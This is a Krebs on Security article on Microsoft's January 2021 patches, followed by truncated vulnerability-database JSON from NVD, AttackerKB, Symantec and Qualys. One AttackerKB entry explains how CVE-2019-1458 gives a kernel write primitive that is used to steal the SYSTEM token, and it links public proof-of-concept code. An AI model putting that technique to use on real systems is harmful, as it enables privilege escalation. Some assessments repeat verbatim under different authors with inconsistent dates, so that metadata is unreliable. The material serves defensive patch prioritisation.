ID KREBS:B3F20C0C41C613971FDADBAE93382CDF Type krebs Reporter BrianKrebs Modified 2021-01-13T01:32:20
Description
Microsoft today released updates to plug more than 80 security holes in its Windows operating systems and other software, including one that is actively being exploited and another which was disclosed prior to today. Ten of the flaws earned Microsoft's most-dire "critical" rating, meaning they could be exploited by malware or miscreants to seize remote control over unpatched systems with little or no interaction from Windows users.
Most concerning of this month's batch is probably a critical bug (CVE-2021-1647) in Microsoft's default anti-malware suite -- Windows Defender -- that is seeing active exploitation. Microsoft recently stopped providing a great deal of detail in their vulnerability advisories, so it's not entirely clear how this is being exploited.
But Kevin Breen, director of research at Immersive Labs, says depending on the vector the flaw could be trivial to exploit.
"It could be as simple as sending a file," he said. "The user doesn't need to interact with anything, as Defender will access it as soon as it is placed on the system."
Fortunately, this bug is probably already patched by Microsoft on end-user systems, as the company continuously updates Defender outside of the normal monthly patch cycle.
Breen called attention to another critical vulnerability this month -- CVE-2021-1660 -- a remote code execution flaw in nearly every version of Windows that earned a CVSS score of 8.8 (10 is the most dangerous).
"They classify this vulnerability as 'low' in complexity, meaning an attack could be easy to reproduce," Breen said. "However, they also note that it's 'less likely' to be exploited, which seems counterintuitive. Without full context of this vulnerability, we have to rely on Microsoft to make the decision for us."
CVE-2021-1660 is actually just one of five bugs in a core Microsoft service called Remote Procedure Call (RPC), which is responsible for a lot of heavy lifting in Windows. Some of the more memorable computer worms of the last decade spread automatically by exploiting RPC vulnerabilities.
Allan Liska, senior security architect at Recorded Future, said while it is concerning that so many vulnerabilities around the same component were released simultaneously, two previous vulnerabilities in RPC -- CVE-2019-1409 and CVE-2018-8514 -- were not widely exploited.
The remaining 70 or so flaws patched this month earned Microsoft's less-dire "important" ratings, which is not to say they're much less of a security concern. Case in point: CVE-2021-1709, which is an "elevation of privilege" flaw in Windows 8 through 10 and Windows Server 2008 through 2019.
"Unfortunately, this type of vulnerability is often quickly exploited by attackers," Liska said. "For example, CVE-2019-1458 was announced on December 10th of 2019, and by December 19th an attacker was seen selling an exploit for the vulnerability on underground markets. So, while CVE-2021-1709 is only rated as [an information exposure flaw] by Microsoft it should be prioritized for patching."
Trend Micro's Zero Day Initiative (ZDI) pointed out another flaw marked "important" -- CVE-2021-1648, an elevation of privilege bug in Windows 8 and 10 and some versions of Windows Server 2012 and 2019 that ZDI publicly disclosed prior to today.
"It was also discovered by Google likely because this patch corrects a bug introduced by a previous patch," ZDI's Dustin Childs said. "The previous CVE was being exploited in the wild, so it's within reason to think this CVE will be actively exploited as well."
Separately, Adobe released security updates to tackle at least eight vulnerabilities across a range of products, including Adobe Photoshop and Illustrator. There are no Flash Player updates because Adobe retired the browser plugin in December (hallelujah!), and Microsoft's update cycle from last month removed the program from Microsoft's browsers.
Windows 10 users should be aware that the operating system will download updates and install them all at once on its own schedule, closing out active programs and rebooting the system. If you wish to ensure Windows has been set to pause updating so you have ample opportunity to back up your files and/or system, see this guide.
Please back up your system before applying any of these updates. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. You never know when a patch roll-up will bork your system or possibly damage important files. For those seeking more flexible and full-featured backup options (including incremental backups), Acronis and Macrium are two that I've used previously and are worth a look.
That said, there don't appear to be any major issues cropping up yet with this month's update batch. But before you apply updates consider paying a visit to AskWoody.com, which usually has the skinny on any reports about problematic patches.
As always, if you experience glitches or issues installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.
Title Microsoft Patch Tuesday, January 2021 Edition Published 2021-01-13T01:32:20 Href https://krebsonsecurity.com/2021/01/microsoft-patch-tuesday-january-2021-edition/
CVEs referenced: CVE-2018-8514, CVE-2019-1409, CVE-2019-1458, CVE-2020-1660, CVE-2021-1647, CVE-2021-1648, CVE-2021-1660, CVE-2021-1709
["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2019-1409", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1409", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:12:52", "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component 
fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "title": "CVE-2019-1458", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2020-10-15T21:15:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2019-1458", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", 
"cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-02-04T21:15:31", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "CVE-2021-1647 is a zero-day remote code execution vulnerability in the Malware Protection Engine component (mpengine.dll) of Microsoft\u2019s Defender anti-virus product. It was published as part of the January 2021 Patch Tuesday release, along with a disclosure from Microsoft acknowledging that the vulnerability had been exploited in the wild. More information: <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>\n\n \n**Recent assessments:** \n \n**cdelafuente-r7** at January 13, 2021 3:55pm UTC reported:\n\nNo useful information has been published so far and most of the speculations found online are based on the [CVSS 3.0](<https://www.first.org/cvss/v3-0/>) metrics found in the [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>). That said, the attack vector seems to be [Local](<https://www.first.org/cvss/v3.0/specification-document#2-1-1-Attack-Vector-AV>) but can be exploited remotely, which means that some kind of malicious file needs to be placed locally to be scanned by Windows Defender and trigger the vulnerability. 
After talking about this with **@smcintyre-r7** and **@bwatters-r7**, we can imagine that `Remote` means this file needs to be sent remotely somehow, for example, using a file upload in a website or an email attachment via Exchange.\n\nSome considerations to keep in mind: Windows defender vulnerabilities get patched immediately and automatically, without user interactions. So, the exploitation window is very short. Finally, even if the exploitation succeeds, the evasion will be problematic, since the anti-virus will probably detect the attack.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 1**gwillcox-r7** at February 04, 2021 7:15pm UTC reported:\n\nNo useful information has been published so far and most of the speculations found online are based on the [CVSS 3.0](<https://www.first.org/cvss/v3-0/>) metrics found in the [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>). That said, the attack vector seems to be [Local](<https://www.first.org/cvss/v3.0/specification-document#2-1-1-Attack-Vector-AV>) but can be exploited remotely, which means that some kind of malicious file needs to be placed locally to be scanned by Windows Defender and trigger the vulnerability. After talking about this with **@smcintyre-r7** and **@bwatters-r7**, we can imagine that `Remote` means this file needs to be sent remotely somehow, for example, using a file upload in a website or an email attachment via Exchange.\n\nSome considerations to keep in mind: Windows defender vulnerabilities get patched immediately and automatically, without user interactions. So, the exploitation window is very short. 
Finally, even if the exploitation succeeds, the evasion will be problematic, since the anti-virus will probably detect the attack.\n", "modified": "2021-01-16T00:00:00", "published": "2021-01-12T00:00:00", "id": "AKB:06000FAE-591B-46C7-8573-3D63BDDD0D13", "href": "https://attackerkb.com/topics/DzXZpEuBeP/cve-2021-1647-microsoft-windows-defender-zero-day-vulnerability", "type": "attackerkb", "title": "CVE-2021-1647 Microsoft Windows Defender Zero-Day Vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-18T06:36:55", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka \u2018Win32k Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 19, 2020 5:31pm UTC reported:\n\nKnown as WizardOpium for its use in the WizardOpium attacks, and first written about by Kaspersky Labs. The writeup by Kaspersky Labs can be found at <https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/> which shows that this vulnerability was used in conjunction with CVE-2019-13720, which was a 0day in the Chrome browser at the time that occurred due to a race condition between two threads.\n\nIn the WizardOpium attacks, the Chrome vulnerability, aka CVE-2019-13720, was first used to gain an arbitrary read/write primitive in the Chrome render process that led to arbitrary code execution as the Chrome render (read more on this at <https://bugs.chromium.org/p/chromium/issues/detail?id=888923> if you're interested). However, this still left attackers with a problem: they needed some way to escape the Chrome render\u2019s sandbox if they wanted to get persistent access to the target.\n\nThis is where CVE-2019-1458 came in. 
Looking at the advisory at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458> we can see this vulnerability affected quite a wide range of targets, going all the way from Windows 7 up to Windows 10 v1607. Later versions of Windows 10 are not affected, however.\n\nIf one dives around the internet a little bit more though they will stumble across <https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html> which was written by the Project Zero team at Google which explains the vulnerability quite well. In essence there is an Uninitialized Variable error in Windows within its Windows Switching code whereby the field `*(gpsi + 0x154)` in the global structure `tagSERVERINFO`, which describes system windows (such as menus, desktops, switch windows, etc), was not properly initialized at the start of a function, which allowed user mode code to set extra window data in a task switch window of Window class `FNID_SWITCH`, or `0x280`, which can normally only be set by the kernel. Even worse though is the fact that this extra window data is essentially a pointer which is then dereferenced and then written to, which grants the attacker a limited arbitrary write primitive in kernel mode, which they can then use to perform limited controlled writes to kernel memory and take over the system. Attackers then used this limited kernel write primitive to overwrite their current process\u2019s access token value with the value of the SYSTEM process\u2019s access token value, thereby allowing them to execute code as SYSTEM.\n\nIf one then looks at <https://github.com/piotrflorczyk/cve-2019-1458_POC>, which does a deep technical dive into all of the details of this vulnerability, one can see that the affected function was `InitFunctionTables()` within `win32k.sys`, which didn\u2019t appropriately initialize the fields `*(gpsi+0x14E)`, `*(gpsi+0x154)`, and `*(gpsi+0x180)`, despite initializing other fields within the same structure. 
Microsoft\u2019s patch ensured that these fields were all set up and initialized with appropriate values at the start of the `InitFunctionTables()` call, thus preventing this issue from occurring.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "modified": "2020-07-24T00:00:00", "published": "2019-12-10T00:00:00", "id": "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "href": "https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458", "type": "attackerkb", "title": "CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-22T06:10:03", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Google Chrome is a web browser used to access the Internet. Successful exploitation of the most severe vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser. Depending on the privileges associated with the application, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. 
If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\n\nUse after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**busterb** at November 01, 2019 6:45pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 2**space-r7** at November 01, 2019 7:32pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. 
Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 2**gwillcox-r7** at November 22, 2020 2:51am UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n", "modified": "2020-10-13T00:00:00", "published": "2019-10-10T00:00:00", "id": "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "href": "https://attackerkb.com/topics/EfbjmUx1X2/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium", "type": "attackerkb", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-14T21:07:38", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316", "CVE-2020-17008", "CVE-2021-1648"], "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. 
This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at December 28, 2020 5:15pm UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the splwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. 
That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 4**gwillcox-r7** at November 22, 2020 2:32am UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the splwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. 
That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n", "modified": "2020-07-24T00:00:00", "published": "2020-06-09T00:00:00", "id": "AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "href": "https://attackerkb.com/topics/bQeeJLG1aP/cve-2020-0986", "type": "attackerkb", "title": "CVE-2020-0986", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-12-12T01:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2018-8514"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. A local attacker can leverage this issue to disclose sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 
2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-12-11T00:00:00", "published": "2018-12-11T00:00:00", "id": "SMNTC-106079", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/106079", "type": "symantec", "title": "Microsoft Windows CVE-2018-8514 Local Information Disclosure Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T16:20:57", "bulletinFamily": "software", "cvelist": ["CVE-2019-1458"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. 
A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-12-10T00:00:00", "published": "2019-12-10T00:00:00", "id": "SMNTC-111060", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111060", "type": "symantec", "title": "Microsoft Windows Win32k CVE-2019-1458 Local Privilege Escalation Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-13T21:21:46", "bulletinFamily": "software", "cvelist": ["CVE-2019-1409"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. 
A local attacker can leverage this issue to disclose sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access 
for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-11-12T00:00:00", "published": "2019-11-12T00:00:00", "id": "SMNTC-110790", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110790", "type": "symantec", "title": "Microsoft Windows Remote Procedure Call CVE-2019-1409 Local Information Disclosure Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2021-01-15T00:26:33", "bulletinFamily": "blog", "cvelist": ["CVE-2020-17087", "CVE-2021-1647", "CVE-2021-1648"], "description": "This month\u2019s Microsoft Patch Tuesday addresses 83 vulnerabilities. The 10 Critical vulnerabilities cover Windows codecs, Office, HEVC video extensions, RPC runtime, and several other workstation vulnerabilities. Adobe released patches today for Photoshop, Campaign Classic, InCopy, Illustrator, Captivate, Bridge and Animate.\n\n### Workstation Patches\n\nOffice and Edge vulnerabilities should be prioritized for workstation-type devices, meaning any system that is used to access email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Microsoft Defender RCE Zero Day\n\nMicrosoft patches Defender Remote Code Execution vulnerability ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in today's patch release for Microsoft Malware Protection Engine. Microsoft stated that this vulnerability was exploited before the patches were made available. 
